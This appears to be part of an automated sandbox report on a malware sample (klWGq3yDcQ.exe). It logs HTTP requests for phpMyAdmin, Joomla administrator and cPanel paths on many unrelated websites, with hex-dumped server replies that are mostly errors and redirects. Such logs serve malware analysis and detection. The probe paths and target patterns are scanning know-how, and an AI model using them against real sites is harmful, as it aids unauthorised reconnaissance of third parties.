                                                                                                                                                                                                    2023-11-26 05:59:31 UTC228INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 53 75 63 75 72 69 2f 43 6c 6f 75 64 70 72 6f 78 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 53 75 63 75 72 69 2d 49 44 3a 20 31 34 30 31 33 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: Sucuri/CloudproxyDate: Sun, 26 Nov 2023 05:59:31 GMTContent-Type: text/htmlContent-Length: 162Connection: closeX-Sucuri-ID: 14013Location: http://coimbrausa.com/phpmyadmin/
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    60192.168.2.45552334.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC166INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-Encoding
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    61192.168.2.45548535.214.252.2474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: locandafrancigena.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    62192.168.2.455789104.21.63.2024436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: leeberg.dk
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    63192.168.2.45581135.164.64.2464436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: belongfbg.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC150INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:31 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedconnection: close
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1321INData Raw: 35 32 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 68 74 6d 6c 2c 62 6f 64 79 7b 0a 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 0a
                                                                                                                                                                                                    Data Ascii: 522<!doctype html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css">html,body{ width:100%; height:100%; margin:0; padding:0;}
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    64192.168.2.455795185.183.156.2184436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: federwild.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 32 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 31 32 20 53 65 70 20 32 30 31 39 20 31 35 3a 30 36 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 33 66 65 2d 35 39 32 35 63 37 62 66 38 63 39 65 33 22 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:31 GMTContent-Type: text/htmlContent-Length: 1022Connection: closeVary: Accept-EncodingLast-Modified: Thu, 12 Sep 2019 15:06:38 GMTETag: "3fe-5925c7bf8c9e3"Accept-Ranges: by
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1022INData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 66 65 64 65 72 77 69 6c 64 2e 61 74 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f
                                                                                                                                                                                                    Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><BASE href="/error_docs/">...[if lte IE 6]></BASE><![endif]--></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><ADDRESS>Web Server at federwild.at</ADDRESS></BO


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    65192.168.2.45579281.169.145.1574436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: kappablu.de
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC178INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    66192.168.2.455516191.252.51.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: financefast.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 33 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:31 GMTServer: ApacheContent-Length: 332Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC332INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /phpmyadmin/on this server.</p><p>Additionally, a 403 Forbiddenerror was encountered wh


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    67192.168.2.45599523.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC174OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC628INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 76 69 65 6e 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 36 32 32 34 30 30 0d 0a 58 2d 50 61 6e 74 68 65 6f 6e 2d 53 74 79 78 2d 48 6f 73 74 6e 61 6d 65 3a 20 73 74 79 78 2d 66 65 31 2d 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeContent-Length: 0Content-Type: text/html; charset=UTF-8Location: https://www.avient.com/administrator/Server: nginxStrict-Transport-Security: max-age=31622400X-Pantheon-Styx-Hostname: styx-fe1-a


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    68192.168.2.456010159.203.32.44436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC176INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 3029Connection: closeContent-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC3029INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><meta content="IE=edge" http-equiv="X-UA-Compatible"> <meta charset="utf-8"/> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport"> <meta con


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    69192.168.2.455963104.247.74.1074436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC190OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                                                                                                                                                    Host: vivanettv.co.ke
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC144INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC7634INData Raw: 31 64 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                                                                                                                                                    Data Ascii: 1dca<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    70192.168.2.456194104.200.30.314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
